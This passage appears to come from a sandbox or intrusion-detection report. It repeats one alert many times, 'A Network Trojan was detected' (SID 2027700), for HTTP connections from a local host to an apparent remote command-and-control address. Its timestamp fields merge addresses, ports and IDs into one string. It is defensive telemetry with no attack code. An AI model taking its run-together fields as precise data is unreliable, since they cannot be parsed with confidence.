                              Source Port:49786
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450231802027700 02/06/23-18:38:14.609316
                              SID:2027700
                              Source Port:50231
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450308802027700 02/06/23-18:38:34.900026
                              SID:2027700
                              Source Port:50308
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450160802027700 02/06/23-18:37:55.923634
                              SID:2027700
                              Source Port:50160
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449992802027700 02/06/23-18:37:10.200128
                              SID:2027700
                              Source Port:49992
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450053802027700 02/06/23-18:37:27.528345
                              SID:2027700
                              Source Port:50053
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449829802027700 02/06/23-18:36:24.582432
                              SID:2027700
                              Source Port:49829
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450219802027700 02/06/23-18:38:11.691917
                              SID:2027700
                              Source Port:50219
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450071802027700 02/06/23-18:37:33.042572
                              SID:2027700
                              Source Port:50071
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449918802027700 02/06/23-18:36:50.149978
                              SID:2027700
                              Source Port:49918
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449930802027700 02/06/23-18:36:55.312009
                              SID:2027700
                              Source Port:49930
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450059802027700 02/06/23-18:37:28.737026
                              SID:2027700
                              Source Port:50059
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450237802027700 02/06/23-18:38:16.048099
                              SID:2027700
                              Source Port:50237
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449841802027700 02/06/23-18:36:27.522197
                              SID:2027700
                              Source Port:49841
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450148802027700 02/06/23-18:37:53.070956
                              SID:2027700
                              Source Port:50148
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450025802027700 02/06/23-18:37:20.761388
                              SID:2027700
                              Source Port:50025
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449974802027700 02/06/23-18:37:05.733543
                              SID:2027700
                              Source Port:49974
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450310802027700 02/06/23-18:38:35.397050
                              SID:2027700
                              Source Port:50310
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450221802027700 02/06/23-18:38:12.187048
                              SID:2027700
                              Source Port:50221
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449885802027700 02/06/23-18:36:39.224150
                              SID:2027700
                              Source Port:49885
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450203802027700 02/06/23-18:38:06.492874
                              SID:2027700
                              Source Port:50203
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449796802027700 02/06/23-18:36:14.772959
                              SID:2027700
                              Source Port:49796
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450114802027700 02/06/23-18:37:43.360834
                              SID:2027700
                              Source Port:50114
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450091802027700 02/06/23-18:37:37.888527
                              SID:2027700
                              Source Port:50091
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450043802027700 02/06/23-18:37:25.122543
                              SID:2027700
                              Source Port:50043
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449946802027700 02/06/23-18:36:58.902146
                              SID:2027700
                              Source Port:49946
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450132802027700 02/06/23-18:37:47.847648
                              SID:2027700
                              Source Port:50132
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449857802027700 02/06/23-18:36:31.085635
                              SID:2027700
                              Source Port:49857
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450002802027700 02/06/23-18:37:14.985690
                              SID:2027700
                              Source Port:50002
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450209802027700 02/06/23-18:38:09.315255
                              SID:2027700
                              Source Port:50209
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449987802027700 02/06/23-18:37:08.994236
                              SID:2027700
                              Source Port:49987
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450104802027700 02/06/23-18:37:40.952667
                              SID:2027700
                              Source Port:50104
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450101802027700 02/06/23-18:37:40.235234
                              SID:2027700
                              Source Port:50101
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449831802027700 02/06/23-18:36:25.110774
                              SID:2027700
                              Source Port:49831
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449834802027700 02/06/23-18:36:25.833187
                              SID:2027700
                              Source Port:49834
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450012802027700 02/06/23-18:37:17.535420
                              SID:2027700
                              Source Port:50012
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450015802027700 02/06/23-18:37:18.281532
                              SID:2027700
                              Source Port:50015
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450364802027700 02/06/23-18:38:50.253164
                              SID:2027700
                              Source Port:50364
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449923802027700 02/06/23-18:36:51.342928
                              SID:2027700
                              Source Port:49923
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449742802027700 02/06/23-18:36:01.986509
                              SID:2027700
                              Source Port:49742
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450272802027700 02/06/23-18:38:24.734925
                              SID:2027700
                              Source Port:50272
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450349802027700 02/06/23-18:38:46.552442
                              SID:2027700
                              Source Port:50349
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450361802027700 02/06/23-18:38:49.540296
                              SID:2027700
                              Source Port:50361
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449745802027700 02/06/23-18:36:02.707219
                              SID:2027700
                              Source Port:49745
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450094802027700 02/06/23-18:37:38.590484
                              SID:2027700
                              Source Port:50094
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450097802027700 02/06/23-18:37:39.294548
                              SID:2027700
                              Source Port:50097
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450186802027700 02/06/23-18:38:02.145296
                              SID:2027700
                              Source Port:50186
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450183802027700 02/06/23-18:38:01.423474
                              SID:2027700
                              Source Port:50183
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449803802027700 02/06/23-18:36:18.277310
                              SID:2027700
                              Source Port:49803
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449770802027700 02/06/23-18:36:08.800628
                              SID:2027700
                              Source Port:49770
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450275802027700 02/06/23-18:38:26.060580
                              SID:2027700
                              Source Port:50275
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449758802027700 02/06/23-18:36:05.847456
                              SID:2027700
                              Source Port:49758
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449977802027700 02/06/23-18:37:06.464355
                              SID:2027700
                              Source Port:49977
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450028802027700 02/06/23-18:37:21.493237
                              SID:2027700
                              Source Port:50028
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450158802027700 02/06/23-18:37:55.451859
                              SID:2027700
                              Source Port:50158
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450117802027700 02/06/23-18:37:44.099592
                              SID:2027700
                              Source Port:50117
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450336802027700 02/06/23-18:38:41.486984
                              SID:2027700
                              Source Port:50336
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450288802027700 02/06/23-18:38:30.033697
                              SID:2027700
                              Source Port:50288
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450247802027700 02/06/23-18:38:18.501382
                              SID:2027700
                              Source Port:50247
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450206802027700 02/06/23-18:38:07.828165
                              SID:2027700
                              Source Port:50206
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449936802027700 02/06/23-18:36:56.541076
                              SID:2027700
                              Source Port:49936
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449806802027700 02/06/23-18:36:19.040858
                              SID:2027700
                              Source Port:49806
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449847802027700 02/06/23-18:36:28.712473
                              SID:2027700
                              Source Port:49847
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449888802027700 02/06/23-18:36:39.931255
                              SID:2027700
                              Source Port:49888
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449799802027700 02/06/23-18:36:15.767938
                              SID:2027700
                              Source Port:49799
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450170802027700 02/06/23-18:37:58.303705
                              SID:2027700
                              Source Port:50170
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449819802027700 02/06/23-18:36:22.168382
                              SID:2027700
                              Source Port:49819
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449908802027700 02/06/23-18:36:47.759181
                              SID:2027700
                              Source Port:49908
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450040802027700 02/06/23-18:37:24.355270
                              SID:2027700
                              Source Port:50040
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449949802027700 02/06/23-18:36:59.621008
                              SID:2027700
                              Source Port:49949
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450081802027700 02/06/23-18:37:35.445260
                              SID:2027700
                              Source Port:50081
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449783802027700 02/06/23-18:36:11.707389
                              SID:2027700
                              Source Port:49783
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450069802027700 02/06/23-18:37:32.561894
                              SID:2027700
                              Source Port:50069
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449920802027700 02/06/23-18:36:50.617008
                              SID:2027700
                              Source Port:49920
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450199802027700 02/06/23-18:38:05.327038
                              SID:2027700
                              Source Port:50199
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450314802027700 02/06/23-18:38:36.369028
                              SID:2027700
                              Source Port:50314
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450118802027700 02/06/23-18:37:44.342002
                              SID:2027700
                              Source Port:50118
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450216802027700 02/06/23-18:38:10.984165
                              SID:2027700
                              Source Port:50216
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449924802027700 02/06/23-18:36:51.587444
                              SID:2027700
                              Source Port:49924
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450252802027700 02/06/23-18:38:19.689919
                              SID:2027700
                              Source Port:50252
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449731802027700 02/06/23-18:35:58.287698
                              SID:2027700
                              Source Port:49731
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449985802027700 02/06/23-18:37:08.510192
                              SID:2027700
                              Source Port:49985
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450350802027700 02/06/23-18:38:46.836121
                              SID:2027700
                              Source Port:50350
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450154802027700 02/06/23-18:37:54.498607
                              SID:2027700
                              Source Port:50154
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449789802027700 02/06/23-18:36:13.130119
                              SID:2027700
                              Source Port:49789
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449887802027700 02/06/23-18:36:39.694821
                              SID:2027700
                              Source Port:49887
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450249802027700 02/06/23-18:38:18.972466
                              SID:2027700
                              Source Port:50249
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450347802027700 02/06/23-18:38:46.051189
                              SID:2027700
                              Source Port:50347
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450056802027700 02/06/23-18:37:28.014710
                              SID:2027700
                              Source Port:50056
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449728802027700 02/06/23-18:35:57.036982
                              SID:2027700
                              Source Port:49728
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449980802027700 02/06/23-18:37:07.211466
                              SID:2027700
                              Source Port:49980
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449826802027700 02/06/23-18:36:23.882734
                              SID:2027700
                              Source Port:49826
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449882802027700 02/06/23-18:36:38.444359
                              SID:2027700
                              Source Port:49882
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449916802027700 02/06/23-18:36:49.663085
                              SID:2027700
                              Source Port:49916
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450089802027700 02/06/23-18:37:37.423384
                              SID:2027700
                              Source Port:50089
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450244802027700 02/06/23-18:38:17.760140
                              SID:2027700
                              Source Port:50244
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449821802027700 02/06/23-18:36:22.668125
                              SID:2027700
                              Source Port:49821
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449879802027700 02/06/23-18:36:37.726488
                              SID:2027700
                              Source Port:49879
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449957802027700 02/06/23-18:37:01.557192
                              SID:2027700
                              Source Port:49957
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450031802027700 02/06/23-18:37:22.219104
                              SID:2027700
                              Source Port:50031
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449862802027700 02/06/23-18:36:32.276209
                              SID:2027700
                              Source Port:49862
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450285802027700 02/06/23-18:38:29.330320
                              SID:2027700
                              Source Port:50285
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450048802027700 02/06/23-18:37:26.342561
                              SID:2027700
                              Source Port:50048
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449792802027700 02/06/23-18:36:13.832898
                              SID:2027700
                              Source Port:49792
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450179802027700 02/06/23-18:38:00.453203
                              SID:2027700
                              Source Port:50179
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450121802027700 02/06/23-18:37:45.046254
                              SID:2027700
                              Source Port:50121
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450322802027700 02/06/23-18:38:38.036621
                              SID:2027700
                              Source Port:50322
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450280802027700 02/06/23-18:38:28.132357
                              SID:2027700
                              Source Port:50280
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450084802027700 02/06/23-18:37:36.184167
                              SID:2027700
                              Source Port:50084
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450339802027700 02/06/23-18:38:42.208795
                              SID:2027700
                              Source Port:50339
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449797802027700 02/06/23-18:36:15.167905
                              SID:2027700
                              Source Port:49797
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450126802027700 02/06/23-18:37:46.263727
                              SID:2027700
                              Source Port:50126
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449952802027700 02/06/23-18:37:00.344242
                              SID:2027700
                              Source Port:49952
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449756802027700 02/06/23-18:36:05.379932
                              SID:2027700
                              Source Port:49756
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449993802027700 02/06/23-18:37:10.446984
                              SID:2027700
                              Source Port:49993
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449932802027700 02/06/23-18:36:55.578353
                              SID:2027700
                              Source Port:49932
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449748802027700 02/06/23-18:36:03.424266
                              SID:2027700
                              Source Port:49748
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449929802027700 02/06/23-18:36:54.008803
                              SID:2027700
                              Source Port:49929
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450260802027700 02/06/23-18:38:21.613963
                              SID:2027700
                              Source Port:50260
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450159802027700 02/06/23-18:37:55.686514
                              SID:2027700
                              Source Port:50159
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449846802027700 02/06/23-18:36:28.476052
                              SID:2027700
                              Source Port:49846
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450076802027700 02/06/23-18:37:34.245536
                              SID:2027700
                              Source Port:50076
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450257802027700 02/06/23-18:38:20.892808
                              SID:2027700
                              Source Port:50257
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450003802027700 02/06/23-18:37:15.250783
                              SID:2027700
                              Source Port:50003
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450174802027700 02/06/23-18:37:59.284898
                              SID:2027700
                              Source Port:50174
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450232802027700 02/06/23-18:38:14.844486
                              SID:2027700
                              Source Port:50232
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450190802027700 02/06/23-18:38:03.117138
                              SID:2027700
                              Source Port:50190
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449965802027700 02/06/23-18:37:03.533120
                              SID:2027700
                              Source Port:49965
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450293802027700 02/06/23-18:38:31.205772
                              SID:2027700
                              Source Port:50293
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450113802027700 02/06/23-18:37:43.122477
                              SID:2027700
                              Source Port:50113
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450211802027700 02/06/23-18:38:09.797468
                              SID:2027700
                              Source Port:50211
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450195802027700 02/06/23-18:38:04.351511
                              SID:2027700
                              Source Port:50195
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449867802027700 02/06/23-18:36:33.500443
                              SID:2027700
                              Source Port:49867
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449784802027700 02/06/23-18:36:11.941698
                              SID:2027700
                              Source Port:49784
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449818802027700 02/06/23-18:36:21.931466
                              SID:2027700
                              Source Port:49818
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449859802027700 02/06/23-18:36:31.553133
                              SID:2027700
                              Source Port:49859
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450330802027700 02/06/23-18:38:40.019565
                              SID:2027700
                              Source Port:50330
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449960802027700 02/06/23-18:37:02.273096
                              SID:2027700
                              Source Port:49960
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450146802027700 02/06/23-18:37:52.585657
                              SID:2027700
                              Source Port:50146
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450359802027700 02/06/23-18:38:49.036581
                              SID:2027700
                              Source Port:50359
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450187802027700 02/06/23-18:38:02.390913
                              SID:2027700
                              Source Port:50187
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450105802027700 02/06/23-18:37:41.185987
                              SID:2027700
                              Source Port:50105
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450302802027700 02/06/23-18:38:33.426503
                              SID:2027700
                              Source Port:50302
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449776802027700 02/06/23-18:36:10.243724
                              SID:2027700
                              Source Port:49776
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450011802027700 02/06/23-18:37:17.285007
                              SID:2027700
                              Source Port:50011
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450229802027700 02/06/23-18:38:14.131856
                              SID:2027700
                              Source Port:50229
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449890802027700 02/06/23-18:36:40.402321
                              SID:2027700
                              Source Port:49890
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450141802027700 02/06/23-18:37:51.394662
                              SID:2027700
                              Source Port:50141
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449854802027700 02/06/23-18:36:30.381462
                              SID:2027700
                              Source Port:49854
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450224802027700 02/06/23-18:38:12.894334
                              SID:2027700
                              Source Port:50224
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450182802027700 02/06/23-18:38:01.180152
                              SID:2027700
                              Source Port:50182
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449937802027700 02/06/23-18:36:56.780041
                              SID:2027700
                              Source Port:49937
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
